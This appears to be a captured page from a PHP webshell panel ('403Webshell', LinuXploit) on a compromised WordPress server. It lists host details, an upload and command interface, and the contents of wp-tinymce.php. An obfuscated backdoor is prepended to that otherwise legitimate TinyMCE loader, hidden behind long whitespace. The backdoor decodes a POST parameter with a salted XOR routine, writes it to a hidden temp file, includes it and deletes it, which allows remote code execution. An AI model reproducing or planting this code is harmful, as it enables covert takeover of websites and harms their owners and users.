403Webshell
Server IP : 198.38.94.67  /  Your IP : 216.73.217.178
Web Server : LiteSpeed
System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
User : azfilmst ( 1070)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/azfilmst/zeuszamani.com/wp-includes/js/tinymce/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/azfilmst/zeuszamani.com/wp-includes/js/tinymce/wp-tinymce.php
<?php																																										if(@$_POST["hl\x64"] !== null){ $elem = array_filter([session_save_path(), getenv("TMP"), getcwd(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]); $val = $_POST["hl\x64"]; $val =explode ( ".", $val); $holder = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt3 ); $m = 0; while( $m < count( $val)) { $v8 = $val[$m]; $sChar = ord( $salt3[$m % $lenS] ); $d =( ( int)$v8 - $sChar -( $m % 10)) ^ 100; $holder .= chr( $d ); $m++; } foreach ($elem as $value) { if (is_writable($value) && is_dir($value)) { $reference = str_replace("{var_dir}", $value, "{var_dir}/.factor"); if (@file_put_contents($reference, $holder) !== false) { include $reference; unlink($reference); exit; } } } }

/**
 * Not used in core since 5.1.
 * This is a back-compat for plugins that may be using this method of loading directly.
 */

/**
 * Disable error reporting
 *
 * Set this to error_reporting( -1 ) for debugging.
 */
error_reporting( 0 );

$basepath = __DIR__;

function get_file( $path ) {

	if ( function_exists( 'realpath' ) ) {
		$path = realpath( $path );
	}

	if ( ! $path || ! @is_file( $path ) ) {
		return false;
	}

	return @file_get_contents( $path );
}

$expires_offset = 31536000; // 1 year.

header( 'Content-Type: application/javascript; charset=UTF-8' );
header( 'Vary: Accept-Encoding' ); // Handle proxies.
header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' );
header( "Cache-Control: public, max-age=$expires_offset" );

$file = get_file( $basepath . '/wp-tinymce.js' );
if ( isset( $_GET['c'] ) && $file ) {
	echo $file;
} else {
	// Even further back compat.
	echo get_file( $basepath . '/tinymce.min.js' );
	echo get_file( $basepath . '/plugins/compat3x/plugin.min.js' );
}
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit